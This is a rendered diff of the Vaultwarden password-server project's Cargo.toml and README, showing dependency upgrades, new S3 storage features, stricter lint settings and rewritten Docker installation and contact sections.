||||||
name = "vaultwarden"
|
name = "vaultwarden"
|
||||||
version = "1.0.0"
|
version = "1.0.0"
|
||||||
authors = ["Daniel García <dani-garcia@users.noreply.github.com>"]
|
authors = ["Daniel García <dani-garcia@users.noreply.github.com>"]
|
||||||
edition = "2021"
|
edition = "2021"
|
||||||
rust-version = "1.74.0"
|
rust-version = "1.86.0"
|
||||||
resolver = "2"
|
resolver = "2"
|
||||||
|
|
||||||
repository = "https://github.com/dani-garcia/vaultwarden"
|
repository = "https://github.com/dani-garcia/vaultwarden"
|
||||||
@@ -18,161 +21,183 @@ build = "build.rs"
|
|||||||
enable_syslog = []
|
enable_syslog = []
|
||||||
mysql = ["diesel/mysql", "diesel_migrations/mysql"]
|
mysql = ["diesel/mysql", "diesel_migrations/mysql"]
|
||||||
postgresql = ["diesel/postgres", "diesel_migrations/postgres"]
|
postgresql = ["diesel/postgres", "diesel_migrations/postgres"]
|
||||||
sqlite = ["diesel/sqlite", "diesel_migrations/sqlite", "libsqlite3-sys"]
|
sqlite = ["diesel/sqlite", "diesel_migrations/sqlite", "dep:libsqlite3-sys"]
|
||||||
# Enable to use a vendored and statically linked openssl
|
# Enable to use a vendored and statically linked openssl
|
||||||
vendored_openssl = ["openssl/vendored"]
|
vendored_openssl = ["openssl/vendored"]
|
||||||
# Enable MiMalloc memory allocator to replace the default malloc
|
# Enable MiMalloc memory allocator to replace the default malloc
|
||||||
# This can improve performance for Alpine builds
|
# This can improve performance for Alpine builds
|
||||||
enable_mimalloc = ["mimalloc"]
|
enable_mimalloc = ["dep:mimalloc"]
|
||||||
# This is a development dependency, and should only be used during development!
|
# This is a development dependency, and should only be used during development!
|
||||||
# It enables the usage of the diesel_logger crate, which is able to output the generated queries.
|
# It enables the usage of the diesel_logger crate, which is able to output the generated queries.
|
||||||
# You also need to set an env variable `QUERY_LOGGER=1` to fully activate this so you do not have to re-compile
|
# You also need to set an env variable `QUERY_LOGGER=1` to fully activate this so you do not have to re-compile
|
||||||
# if you want to turn off the logging for a specific run.
|
# if you want to turn off the logging for a specific run.
|
||||||
query_logger = ["diesel_logger"]
|
query_logger = ["dep:diesel_logger"]
|
||||||
|
s3 = ["opendal/services-s3", "dep:aws-config", "dep:aws-credential-types", "dep:aws-smithy-runtime-api", "dep:anyhow", "dep:http", "dep:reqsign"]
|
||||||
|
|
||||||
# Enable unstable features, requires nightly
|
# Enable unstable features, requires nightly
|
||||||
# Currently only used to enable rusts official ip support
|
# Currently only used to enable rusts official ip support
|
||||||
unstable = []
|
unstable = []
|
||||||
|
|
||||||
[target."cfg(not(windows))".dependencies]
|
[target."cfg(unix)".dependencies]
|
||||||
# Logging
|
# Logging
|
||||||
syslog = "6.1.0"
|
syslog = "7.0.0"
|
||||||
|
|
||||||
[dependencies]
|
[dependencies]
|
||||||
|
macros = { path = "./macros" }
|
||||||
|
|
||||||
# Logging
|
# Logging
|
||||||
log = "0.4.20"
|
log = "0.4.27"
|
||||||
fern = { version = "0.6.2", features = ["syslog-6", "reopen-1"] }
|
fern = { version = "0.7.1", features = ["syslog-7", "reopen-1"] }
|
||||||
tracing = { version = "0.1.40", features = ["log"] } # Needed to have lettre and webauthn-rs trace logging to work
|
tracing = { version = "0.1.41", features = ["log"] } # Needed to have lettre and webauthn-rs trace logging to work
|
||||||
|
|
||||||
# A `dotenv` implementation for Rust
|
# A `dotenv` implementation for Rust
|
||||||
dotenvy = { version = "0.15.7", default-features = false }
|
dotenvy = { version = "0.15.7", default-features = false }
|
||||||
|
|
||||||
# Lazy initialization
|
# Lazy initialization
|
||||||
once_cell = "1.19.0"
|
once_cell = "1.21.3"
|
||||||
|
|
||||||
# Numerical libraries
|
# Numerical libraries
|
||||||
num-traits = "0.2.18"
|
num-traits = "0.2.19"
|
||||||
num-derive = "0.4.2"
|
num-derive = "0.4.2"
|
||||||
bigdecimal = "0.4.2"
|
bigdecimal = "0.4.8"
|
||||||
|
|
||||||
# Web framework
|
# Web framework
|
||||||
rocket = { version = "0.5.0", features = ["tls", "json"], default-features = false }
|
rocket = { version = "0.5.1", features = ["tls", "json"], default-features = false }
|
||||||
rocket_ws = { version ="0.1.0" }
|
rocket_ws = { version ="0.1.1" }
|
||||||
|
|
||||||
# WebSockets libraries
|
# WebSockets libraries
|
||||||
tokio-tungstenite = "0.20.1"
|
rmpv = "1.3.0" # MessagePack library
|
||||||
rmpv = "1.0.1" # MessagePack library
|
|
||||||
|
|
||||||
# Concurrent HashMap used for WebSocket messaging and favicons
|
# Concurrent HashMap used for WebSocket messaging and favicons
|
||||||
dashmap = "5.5.3"
|
dashmap = "6.1.0"
|
||||||
|
|
||||||
# Async futures
|
# Async futures
|
||||||
futures = "0.3.30"
|
futures = "0.3.31"
|
||||||
tokio = { version = "1.36.0", features = ["rt-multi-thread", "fs", "io-util", "parking_lot", "time", "signal"] }
|
tokio = { version = "1.46.1", features = ["rt-multi-thread", "fs", "io-util", "parking_lot", "time", "signal", "net"] }
|
||||||
|
tokio-util = { version = "0.7.15", features = ["compat"]}
|
||||||
|
|
||||||
# A generic serialization/deserialization framework
|
# A generic serialization/deserialization framework
|
||||||
serde = { version = "1.0.197", features = ["derive"] }
|
serde = { version = "1.0.219", features = ["derive"] }
|
||||||
serde_json = "1.0.114"
|
serde_json = "1.0.140"
|
||||||
|
|
||||||
# A safe, extensible ORM and Query builder
|
# A safe, extensible ORM and Query builder
|
||||||
diesel = { version = "2.1.4", features = ["chrono", "r2d2", "numeric"] }
|
diesel = { version = "2.2.12", features = ["chrono", "r2d2", "numeric"] }
|
||||||
diesel_migrations = "2.1.0"
|
diesel_migrations = "2.2.0"
|
||||||
diesel_logger = { version = "0.3.0", optional = true }
|
diesel_logger = { version = "0.4.0", optional = true }
|
||||||
|
|
||||||
|
derive_more = { version = "2.0.1", features = ["from", "into", "as_ref", "deref", "display"] }
|
||||||
|
diesel-derive-newtype = "2.1.2"
|
||||||
|
|
||||||
# Bundled/Static SQLite
|
# Bundled/Static SQLite
|
||||||
libsqlite3-sys = { version = "0.27.0", features = ["bundled"], optional = true }
|
libsqlite3-sys = { version = "0.35.0", features = ["bundled"], optional = true }
|
||||||
|
|
||||||
# Crypto-related libraries
|
# Crypto-related libraries
|
||||||
rand = { version = "0.8.5", features = ["small_rng"] }
|
rand = "0.9.1"
|
||||||
ring = "0.17.8"
|
ring = "0.17.14"
|
||||||
|
subtle = "2.6.1"
|
||||||
|
|
||||||
# UUID generation
|
# UUID generation
|
||||||
uuid = { version = "1.7.0", features = ["v4"] }
|
uuid = { version = "1.17.0", features = ["v4"] }
|
||||||
|
|
||||||
# Date and time libraries
|
# Date and time libraries
|
||||||
chrono = { version = "0.4.34", features = ["clock", "serde"], default-features = false }
|
chrono = { version = "0.4.41", features = ["clock", "serde"], default-features = false }
|
||||||
chrono-tz = "0.8.6"
|
chrono-tz = "0.10.4"
|
||||||
time = "0.3.34"
|
time = "0.3.41"
|
||||||
|
|
||||||
# Job scheduler
|
# Job scheduler
|
||||||
job_scheduler_ng = "2.0.4"
|
job_scheduler_ng = "2.2.0"
|
||||||
|
|
||||||
# Data encoding library Hex/Base32/Base64
|
# Data encoding library Hex/Base32/Base64
|
||||||
data-encoding = "2.5.0"
|
data-encoding = "2.9.0"
|
||||||
|
|
||||||
# JWT library
|
# JWT library
|
||||||
jsonwebtoken = "9.2.0"
|
jsonwebtoken = "9.3.1"
|
||||||
|
|
||||||
# TOTP library
|
# TOTP library
|
||||||
totp-lite = "2.0.1"
|
totp-lite = "2.0.1"
|
||||||
|
|
||||||
# Yubico Library
|
# Yubico Library
|
||||||
yubico = { version = "0.11.0", features = ["online-tokio"], default-features = false }
|
yubico = { package = "yubico_ng", version = "0.13.0", features = ["online-tokio"], default-features = false }
|
||||||
|
|
||||||
# WebAuthn libraries
|
# WebAuthn libraries
|
||||||
webauthn-rs = "0.3.2"
|
webauthn-rs = "0.3.2"
|
||||||
|
|
||||||
# Handling of URL's for WebAuthn and favicons
|
# Handling of URL's for WebAuthn and favicons
|
||||||
url = "2.5.0"
|
url = "2.5.4"
|
||||||
|
|
||||||
# Email libraries
|
# Email libraries
|
||||||
lettre = { version = "0.11.4", features = ["smtp-transport", "sendmail-transport", "builder", "serde", "tokio1-native-tls", "hostname", "tracing", "tokio1"], default-features = false }
|
lettre = { version = "0.11.17", features = ["smtp-transport", "sendmail-transport", "builder", "serde", "hostname", "tracing", "tokio1-rustls", "ring", "rustls-native-certs"], default-features = false }
|
||||||
percent-encoding = "2.3.1" # URL encoding library used for URL's in the emails
|
percent-encoding = "2.3.1" # URL encoding library used for URL's in the emails
|
||||||
email_address = "0.2.4"
|
email_address = "0.2.9"
|
||||||
|
|
||||||
# HTML Template library
|
# HTML Template library
|
||||||
handlebars = { version = "5.1.0", features = ["dir_source"] }
|
handlebars = { version = "6.3.2", features = ["dir_source"] }
|
||||||
|
|
||||||
# HTTP client (Used for favicons, version check, DUO and HIBP API)
|
# HTTP client (Used for favicons, version check, DUO and HIBP API)
|
||||||
reqwest = { version = "0.11.24", features = ["stream", "json", "gzip", "brotli", "socks", "cookies", "trust-dns", "native-tls-alpn"] }
|
reqwest = { version = "0.12.22", features = ["rustls-tls", "rustls-tls-native-roots", "stream", "json", "deflate", "gzip", "brotli", "zstd", "socks", "cookies", "charset", "http2", "system-proxy"], default-features = false}
|
||||||
|
hickory-resolver = "0.25.2"
|
||||||
|
|
||||||
# Favicon extraction libraries
|
# Favicon extraction libraries
|
||||||
html5gum = "0.5.7"
|
html5gum = "0.7.0"
|
||||||
regex = { version = "1.10.3", features = ["std", "perf", "unicode-perl"], default-features = false }
|
regex = { version = "1.11.1", features = ["std", "perf", "unicode-perl"], default-features = false }
|
||||||
data-url = "0.3.1"
|
data-url = "0.3.1"
|
||||||
bytes = "1.5.0"
|
bytes = "1.10.1"
|
||||||
|
svg-hush = "0.9.5"
|
||||||
|
|
||||||
# Cache function results (Used for version check and favicon fetching)
|
# Cache function results (Used for version check and favicon fetching)
|
||||||
cached = { version = "0.48.1", features = ["async"] }
|
cached = { version = "0.55.1", features = ["async"] }
|
||||||
|
|
||||||
# Used for custom short lived cookie jar during favicon extraction
|
# Used for custom short lived cookie jar during favicon extraction
|
||||||
cookie = "0.17.0"
|
cookie = "0.18.1"
|
||||||
cookie_store = "0.20.0"
|
cookie_store = "0.21.1"
|
||||||
|
|
||||||
# Used by U2F, JWT and PostgreSQL
|
# Used by U2F, JWT and PostgreSQL
|
||||||
openssl = "0.10.64"
|
openssl = "0.10.73"
|
||||||
|
|
||||||
# CLI argument parsing
|
# CLI argument parsing
|
||||||
pico-args = "0.5.0"
|
pico-args = "0.5.0"
|
||||||
|
|
||||||
# Macro ident concatenation
|
# Macro ident concatenation
|
||||||
paste = "1.0.14"
|
pastey = "0.1.0"
|
||||||
governor = "0.6.3"
|
governor = "0.10.0"
|
||||||
|
|
||||||
# Check client versions for specific features.
|
# Check client versions for specific features.
|
||||||
semver = "1.0.22"
|
semver = "1.0.26"
|
||||||
|
|
||||||
# Allow overriding the default memory allocator
|
# Allow overriding the default memory allocator
|
||||||
# Mainly used for the musl builds, since the default musl malloc is very slow
|
# Mainly used for the musl builds, since the default musl malloc is very slow
|
||||||
mimalloc = { version = "0.1.39", features = ["secure"], default-features = false, optional = true }
|
mimalloc = { version = "0.1.47", features = ["secure"], default-features = false, optional = true }
|
||||||
which = "6.0.0"
|
|
||||||
|
which = "8.0.0"
|
||||||
|
|
||||||
# Argon2 library with support for the PHC format
|
# Argon2 library with support for the PHC format
|
||||||
argon2 = "0.5.3"
|
argon2 = "0.5.3"
|
||||||
|
|
||||||
# Reading a password from the cli for generating the Argon2id ADMIN_TOKEN
|
# Reading a password from the cli for generating the Argon2id ADMIN_TOKEN
|
||||||
rpassword = "7.3.1"
|
rpassword = "7.4.0"
|
||||||
|
|
||||||
|
# Loading a dynamic CSS Stylesheet
|
||||||
|
grass_compiler = { version = "0.13.4", default-features = false }
|
||||||
|
|
||||||
|
# File are accessed through Apache OpenDAL
|
||||||
|
opendal = { version = "0.53.3", features = ["services-fs"], default-features = false }
|
||||||
|
|
||||||
|
# For retrieving AWS credentials, including temporary SSO credentials
|
||||||
|
anyhow = { version = "1.0.98", optional = true }
|
||||||
|
aws-config = { version = "1.8.1", features = ["behavior-version-latest", "rt-tokio", "credentials-process", "sso"], default-features = false, optional = true }
|
||||||
|
aws-credential-types = { version = "1.2.3", optional = true }
|
||||||
|
aws-smithy-runtime-api = { version = "1.8.3", optional = true }
|
||||||
|
http = { version = "1.3.1", optional = true }
|
||||||
|
reqsign = { version = "0.16.5", optional = true }
|
||||||
|
|
||||||
# Strip debuginfo from the release builds
|
# Strip debuginfo from the release builds
|
||||||
# The symbols are the provide better panic traces
|
# The debug symbols are to provide better panic traces
|
||||||
# Also enable fat LTO and use 1 codegen unit for optimizations
|
# Also enable fat LTO and use 1 codegen unit for optimizations
|
||||||
[profile.release]
|
[profile.release]
|
||||||
strip = "debuginfo"
|
strip = "debuginfo"
|
||||||
lto = "fat"
|
lto = "fat"
|
||||||
codegen-units = 1
|
codegen-units = 1
|
||||||
|
|
||||||
|
|
||||||
# A little bit of a speedup
|
# A little bit of a speedup
|
||||||
[profile.dev]
|
[profile.dev]
|
||||||
split-debuginfo = "unpacked"
|
split-debuginfo = "unpacked"
|
||||||
@@ -200,34 +225,51 @@ lto = "thin"
|
|||||||
codegen-units = 16
|
codegen-units = 16
|
||||||
|
|
||||||
# Linting config
|
# Linting config
|
||||||
[lints.rust]
|
# https://doc.rust-lang.org/rustc/lints/groups.html
|
||||||
|
[workspace.lints.rust]
|
||||||
# Forbid
|
# Forbid
|
||||||
unsafe_code = "forbid"
|
unsafe_code = "forbid"
|
||||||
non_ascii_idents = "forbid"
|
non_ascii_idents = "forbid"
|
||||||
|
|
||||||
# Deny
|
# Deny
|
||||||
future_incompatible = "deny"
|
deprecated_in_future = "deny"
|
||||||
|
future_incompatible = { level = "deny", priority = -1 }
|
||||||
|
keyword_idents = { level = "deny", priority = -1 }
|
||||||
|
let_underscore = { level = "deny", priority = -1 }
|
||||||
noop_method_call = "deny"
|
noop_method_call = "deny"
|
||||||
pointer_structural_match = "deny"
|
refining_impl_trait = { level = "deny", priority = -1 }
|
||||||
rust_2018_idioms = "deny"
|
rust_2018_idioms = { level = "deny", priority = -1 }
|
||||||
rust_2021_compatibility = "deny"
|
rust_2021_compatibility = { level = "deny", priority = -1 }
|
||||||
|
rust_2024_compatibility = { level = "deny", priority = -1 }
|
||||||
|
edition_2024_expr_fragment_specifier = "allow" # Once changed to Rust 2024 this should be removed and macro's should be validated again
|
||||||
|
single_use_lifetimes = "deny"
|
||||||
trivial_casts = "deny"
|
trivial_casts = "deny"
|
||||||
trivial_numeric_casts = "deny"
|
trivial_numeric_casts = "deny"
|
||||||
unused = "deny"
|
unused = { level = "deny", priority = -1 }
|
||||||
unused_import_braces = "deny"
|
unused_import_braces = "deny"
|
||||||
unused_lifetimes = "deny"
|
unused_lifetimes = "deny"
|
||||||
deprecated_in_future = "deny"
|
unused_qualifications = "deny"
|
||||||
|
variant_size_differences = "deny"
|
||||||
|
# Allow the following lints since these cause issues with Rust v1.84.0 or newer
|
||||||
|
# Building Vaultwarden with Rust v1.85.0 and edition 2024 also works without issues
|
||||||
|
if_let_rescope = "allow"
|
||||||
|
tail_expr_drop_order = "allow"
|
||||||
|
|
||||||
[lints.clippy]
|
# https://rust-lang.github.io/rust-clippy/stable/index.html
|
||||||
# Allow
|
[workspace.lints.clippy]
|
||||||
# We need this since Rust v1.76+, since it has some bugs
|
# Warn
|
||||||
# https://github.com/rust-lang/rust-clippy/issues/12016
|
dbg_macro = "warn"
|
||||||
blocks_in_conditions = "allow"
|
todo = "warn"
|
||||||
|
|
||||||
|
# Ignore/Allow
|
||||||
|
result_large_err = "allow"
|
||||||
|
|
||||||
# Deny
|
# Deny
|
||||||
|
case_sensitive_file_extension_comparisons = "deny"
|
||||||
cast_lossless = "deny"
|
cast_lossless = "deny"
|
||||||
clone_on_ref_ptr = "deny"
|
clone_on_ref_ptr = "deny"
|
||||||
equatable_if_let = "deny"
|
equatable_if_let = "deny"
|
||||||
|
filter_map_next = "deny"
|
||||||
float_cmp_const = "deny"
|
float_cmp_const = "deny"
|
||||||
inefficient_to_string = "deny"
|
inefficient_to_string = "deny"
|
||||||
iter_on_empty_collections = "deny"
|
iter_on_empty_collections = "deny"
|
||||||
@@ -239,11 +281,18 @@ manual_instant_elapsed = "deny"
|
|||||||
manual_string_new = "deny"
|
manual_string_new = "deny"
|
||||||
match_wildcard_for_single_variants = "deny"
|
match_wildcard_for_single_variants = "deny"
|
||||||
mem_forget = "deny"
|
mem_forget = "deny"
|
||||||
|
needless_continue = "deny"
|
||||||
needless_lifetimes = "deny"
|
needless_lifetimes = "deny"
|
||||||
|
option_option = "deny"
|
||||||
string_add_assign = "deny"
|
string_add_assign = "deny"
|
||||||
string_to_string = "deny"
|
string_to_string = "deny"
|
||||||
unnecessary_join = "deny"
|
unnecessary_join = "deny"
|
||||||
unnecessary_self_imports = "deny"
|
unnecessary_self_imports = "deny"
|
||||||
|
unnested_or_patterns = "deny"
|
||||||
unused_async = "deny"
|
unused_async = "deny"
|
||||||
|
unused_self = "deny"
|
||||||
verbose_file_reads = "deny"
|
verbose_file_reads = "deny"
|
||||||
zero_sized_map_values = "deny"
|
zero_sized_map_values = "deny"
|
||||||
|
|
||||||
|
[lints]
|
||||||
|
workspace = true
|
||||||
|
|||||||
204
README.md
204
README.md
@@ -1,102 +1,146 @@
|
|||||||
### Alternative implementation of the Bitwarden server API written in Rust and compatible with [upstream Bitwarden clients](https://bitwarden.com/download/)*, perfect for self-hosted deployment where running the official resource-heavy service might not be ideal.
|

|
||||||
|
|
||||||
📢 Note: This project was known as Bitwarden_RS and has been renamed to separate itself from the official Bitwarden server in the hopes of avoiding confusion and trademark/branding issues. Please see [#1642](https://github.com/dani-garcia/vaultwarden/discussions/1642) for more explanation.
|
An alternative server implementation of the Bitwarden Client API, written in Rust and compatible with [official Bitwarden clients](https://bitwarden.com/download/) [[disclaimer](#disclaimer)], perfect for self-hosted deployment where running the official resource-heavy service might not be ideal.
|
||||||
|
|
||||||
---
|
---
|
||||||
[](https://github.com/dani-garcia/vaultwarden/actions/workflows/build.yml)
|
|
||||||
[](https://github.com/dani-garcia/vaultwarden/pkgs/container/vaultwarden)
|
|
||||||
[](https://hub.docker.com/r/vaultwarden/server)
|
|
||||||
[](https://quay.io/repository/vaultwarden/server)
|
|
||||||
[](https://deps.rs/repo/github/dani-garcia/vaultwarden)
|
|
||||||
[](https://github.com/dani-garcia/vaultwarden/releases/latest)
|
|
||||||
[](https://github.com/dani-garcia/vaultwarden/blob/main/LICENSE.txt)
|
|
||||||
[](https://matrix.to/#/#vaultwarden:matrix.org)
|
|
||||||
|
|
||||||
Image is based on [Rust implementation of Bitwarden API](https://github.com/dani-garcia/vaultwarden).
|
[](https://github.com/dani-garcia/vaultwarden/releases/latest)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/pkgs/container/vaultwarden)
|
||||||
|
[](https://hub.docker.com/r/vaultwarden/server)
|
||||||
|
[](https://quay.io/repository/vaultwarden/server) <br>
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/graphs/contributors)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/network/members)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/stargazers)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/issues)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/issues?q=is%3Aissue+is%3Aclosed)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/blob/main/LICENSE.txt) <br>
|
||||||
|
[%3D'svg'%5D%2F*%5Blocal-name()%3D'g'%5D%5B2%5D%2F*%5Blocal-name()%3D'text'%5D%5B4%5D&style=flat-square&logo=rust&label=dependencies&color=005AA4)](https://deps.rs/repo/github/dani-garcia/vaultwarden)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/actions/workflows/release.yml)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/actions/workflows/build.yml) <br>
|
||||||
|
[](https://matrix.to/#/#vaultwarden:matrix.org)
|
||||||
|
[](https://github.com/dani-garcia/vaultwarden/discussions)
|
||||||
|
[](https://vaultwarden.discourse.group/)
|
||||||
|
|
||||||
**This project is not associated with the [Bitwarden](https://bitwarden.com/) project nor Bitwarden, Inc.**
|
> [!IMPORTANT]
|
||||||
|
> **When using this server, please report any bugs or suggestions directly to us (see [Get in touch](#get-in-touch)), regardless of whatever clients you are using (mobile, desktop, browser...). DO NOT use the official Bitwarden support channels.**
|
||||||
|
|
||||||
#### ⚠️**IMPORTANT**⚠️: When using this server, please report any bugs or suggestions to us directly (look at the bottom of this page for ways to get in touch), regardless of whatever clients you are using (mobile, desktop, browser...). DO NOT use the official support channels.
|
<br>
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
## Features
|
## Features
|
||||||
|
|
||||||
Basically full implementation of Bitwarden API is provided including:
|
A nearly complete implementation of the Bitwarden Client API is provided, including:
|
||||||
|
|
||||||
* Organizations support
|
* [Personal Vault](https://bitwarden.com/help/managing-items/)
|
||||||
* Attachments and Send
|
* [Send](https://bitwarden.com/help/about-send/)
|
||||||
* Vault API support
|
* [Attachments](https://bitwarden.com/help/attachments/)
|
||||||
* Serving the static files for Vault interface
|
* [Website icons](https://bitwarden.com/help/website-icons/)
|
||||||
* Website icons API
|
* [Personal API Key](https://bitwarden.com/help/personal-api-key/)
|
||||||
* Authenticator and U2F support
|
* [Organizations](https://bitwarden.com/help/getting-started-organizations/)
|
||||||
* YubiKey and Duo support
|
- [Collections](https://bitwarden.com/help/about-collections/),
|
||||||
* Emergency Access
|
[Password Sharing](https://bitwarden.com/help/sharing/),
|
||||||
|
[Member Roles](https://bitwarden.com/help/user-types-access-control/),
|
||||||
|
[Groups](https://bitwarden.com/help/about-groups/),
|
||||||
|
[Event Logs](https://bitwarden.com/help/event-logs/),
|
||||||
|
[Admin Password Reset](https://bitwarden.com/help/admin-reset/),
|
||||||
|
[Directory Connector](https://bitwarden.com/help/directory-sync/),
|
||||||
|
[Policies](https://bitwarden.com/help/policies/)
|
||||||
|
* [Multi/Two Factor Authentication](https://bitwarden.com/help/bitwarden-field-guide-two-step-login/)
|
||||||
|
- [Authenticator](https://bitwarden.com/help/setup-two-step-login-authenticator/),
|
||||||
|
[Email](https://bitwarden.com/help/setup-two-step-login-email/),
|
||||||
|
[FIDO2 WebAuthn](https://bitwarden.com/help/setup-two-step-login-fido/),
|
||||||
|
[YubiKey](https://bitwarden.com/help/setup-two-step-login-yubikey/),
|
||||||
|
[Duo](https://bitwarden.com/help/setup-two-step-login-duo/)
|
||||||
|
* [Emergency Access](https://bitwarden.com/help/emergency-access/)
|
||||||
|
* [Vaultwarden Admin Backend](https://github.com/dani-garcia/vaultwarden/wiki/Enabling-admin-page)
|
||||||
|
* [Modified Web Vault client](https://github.com/dani-garcia/bw_web_builds) (Bundled within our containers)
|
||||||
|
|
||||||
## Installation
|
<br>
|
||||||
Pull the docker image and mount a volume from the host for persistent storage:
|
|
||||||
|
|
||||||
```sh
|
|
||||||
docker pull vaultwarden/server:latest
|
|
||||||
docker run -d --name vaultwarden -v /vw-data/:/data/ --restart unless-stopped -p 80:80 vaultwarden/server:latest
|
|
||||||
```
|
|
||||||
This will preserve any persistent data under /vw-data/, you can adapt the path to whatever suits you.
|
|
||||||
|
|
||||||
**IMPORTANT**: Most modern web browsers disallow the use of Web Crypto APIs in insecure contexts. In this case, you might get an error like `Cannot read property 'importKey'`. To solve this problem, you need to access the web vault via HTTPS or localhost.
|
|
||||||
|
|
||||||
This can be configured in [vaultwarden directly](https://github.com/dani-garcia/vaultwarden/wiki/Enabling-HTTPS) or using a third-party reverse proxy ([some examples](https://github.com/dani-garcia/vaultwarden/wiki/Proxy-examples)).
|
|
||||||
|
|
||||||
If you have an available domain name, you can get HTTPS certificates with [Let's Encrypt](https://letsencrypt.org/), or you can generate self-signed certificates with utilities like [mkcert](https://github.com/FiloSottile/mkcert). Some proxies automatically do this step, like Caddy (see examples linked above).
|
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
See the [vaultwarden wiki](https://github.com/dani-garcia/vaultwarden/wiki) for more information on how to configure and run the vaultwarden server.
|
|
||||||
|
> [!IMPORTANT]
|
||||||
|
> The web-vault requires the use a secure context for the [Web Crypto API](https://developer.mozilla.org/en-US/docs/Web/API/Web_Crypto_API).
|
||||||
|
> That means it will only work via `http://localhost:8000` (using the port from the example below) or if you [enable HTTPS](https://github.com/dani-garcia/vaultwarden/wiki/Enabling-HTTPS).
|
||||||
|
|
||||||
|
The recommended way to install and use Vaultwarden is via our container images which are published to [ghcr.io](https://github.com/dani-garcia/vaultwarden/pkgs/container/vaultwarden), [docker.io](https://hub.docker.com/r/vaultwarden/server) and [quay.io](https://quay.io/repository/vaultwarden/server).
|
||||||
|
See [which container image to use](https://github.com/dani-garcia/vaultwarden/wiki/Which-container-image-to-use) for an explanation of the provided tags.
|
||||||
|
|
||||||
|
There are also [community driven packages](https://github.com/dani-garcia/vaultwarden/wiki/Third-party-packages) which can be used, but those might be lagging behind the latest version or might deviate in the way Vaultwarden is configured, as described in our [Wiki](https://github.com/dani-garcia/vaultwarden/wiki).
|
||||||
|
|
||||||
|
Alternatively, you can also [build Vaultwarden](https://github.com/dani-garcia/vaultwarden/wiki/Building-binary) yourself.
|
||||||
|
|
||||||
|
While Vaultwarden is based upon the [Rocket web framework](https://rocket.rs) which has built-in support for TLS our recommendation would be that you setup a reverse proxy (see [proxy examples](https://github.com/dani-garcia/vaultwarden/wiki/Proxy-examples)).
|
||||||
|
|
||||||
|
> [!TIP]
|
||||||
|
>**For more detailed examples on how to install, use and configure Vaultwarden you can check our [Wiki](https://github.com/dani-garcia/vaultwarden/wiki).**
|
||||||
|
|
||||||
|
### Docker/Podman CLI
|
||||||
|
|
||||||
|
Pull the container image and mount a volume from the host for persistent storage.<br>
|
||||||
|
You can replace `docker` with `podman` if you prefer to use podman.
|
||||||
|
|
||||||
|
```shell
|
||||||
|
docker pull vaultwarden/server:latest
|
||||||
|
docker run --detach --name vaultwarden \
|
||||||
|
--env DOMAIN="https://vw.domain.tld" \
|
||||||
|
--volume /vw-data/:/data/ \
|
||||||
|
--restart unless-stopped \
|
||||||
|
--publish 127.0.0.1:8000:80 \
|
||||||
|
vaultwarden/server:latest
|
||||||
|
```
|
||||||
|
|
||||||
|
This will preserve any persistent data under `/vw-data/`, you can adapt the path to whatever suits you.
|
||||||
|
|
||||||
|
### Docker Compose
|
||||||
|
|
||||||
|
To use Docker compose you need to create a `compose.yaml` which will hold the configuration to run the Vaultwarden container.
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
services:
|
||||||
|
vaultwarden:
|
||||||
|
image: vaultwarden/server:latest
|
||||||
|
container_name: vaultwarden
|
||||||
|
restart: unless-stopped
|
||||||
|
environment:
|
||||||
|
DOMAIN: "https://vw.domain.tld"
|
||||||
|
volumes:
|
||||||
|
- ./vw-data/:/data/
|
||||||
|
ports:
|
||||||
|
- 127.0.0.1:8000:80
|
||||||
|
```
|
||||||
|
|
||||||
|
<br>
|
||||||
|
|
||||||
## Get in touch
|
## Get in touch
|
||||||
To ask a question, offer suggestions or new features or to get help configuring or installing the software, please use [GitHub Discussions](https://github.com/dani-garcia/vaultwarden/discussions) or [the forum](https://vaultwarden.discourse.group/).
|
|
||||||
|
|
||||||
If you spot any bugs or crashes with vaultwarden itself, please [create an issue](https://github.com/dani-garcia/vaultwarden/issues/). Make sure you are on the latest version and there aren't any similar issues open, though!
|
Have a question, suggestion or need help? Join our community on [Matrix](https://matrix.to/#/#vaultwarden:matrix.org), [GitHub Discussions](https://github.com/dani-garcia/vaultwarden/discussions) or [Discourse Forums](https://vaultwarden.discourse.group/).
|
||||||
|
|
||||||
If you prefer to chat, we're usually hanging around at [#vaultwarden:matrix.org](https://matrix.to/#/#vaultwarden:matrix.org) room on Matrix. Feel free to join us!
|
Encountered a bug or crash? Please search our issue tracker and discussions to see if it's already been reported. If not, please [start a new discussion](https://github.com/dani-garcia/vaultwarden/discussions) or [create a new issue](https://github.com/dani-garcia/vaultwarden/issues/). Ensure you're using the latest version of Vaultwarden and there aren't any similar issues open or closed!
|
||||||
|
|
||||||
|
<br>
|
||||||
|
|
||||||
|
## Contributors
|
||||||
|
|
||||||
### Sponsors
|
|
||||||
Thanks for your contribution to the project!
|
Thanks for your contribution to the project!
|
||||||
|
|
||||||
<!--
|
[](https://github.com/dani-garcia/vaultwarden/graphs/contributors)<br>
|
||||||
<table>
|
[](https://github.com/dani-garcia/vaultwarden/graphs/contributors)
|
||||||
<tr>
|
|
||||||
<td align="center">
|
|
||||||
<a href="https://github.com/username">
|
|
||||||
<img src="https://avatars.githubusercontent.com/u/725423?s=75&v=4" width="75px;" alt="username"/>
|
|
||||||
<br />
|
|
||||||
<sub><b>username</b></sub>
|
|
||||||
</a>
|
|
||||||
</td>
|
|
||||||
</tr>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<br/>
|
<br>
|
||||||
-->
|
|
||||||
|
|
||||||
<table>
|
## Disclaimer
|
||||||
<tr>
|
|
||||||
<td align="center">
|
**This project is not associated with [Bitwarden](https://bitwarden.com/) or Bitwarden, Inc.**
|
||||||
<a href="https://github.com/themightychris" style="width: 75px">
|
|
||||||
<sub><b>Chris Alfano</b></sub>
|
However, one of the active maintainers for Vaultwarden is employed by Bitwarden and is allowed to contribute to the project on their own time. These contributions are independent of Bitwarden and are reviewed by other maintainers.
|
||||||
</a>
|
|
||||||
</td>
|
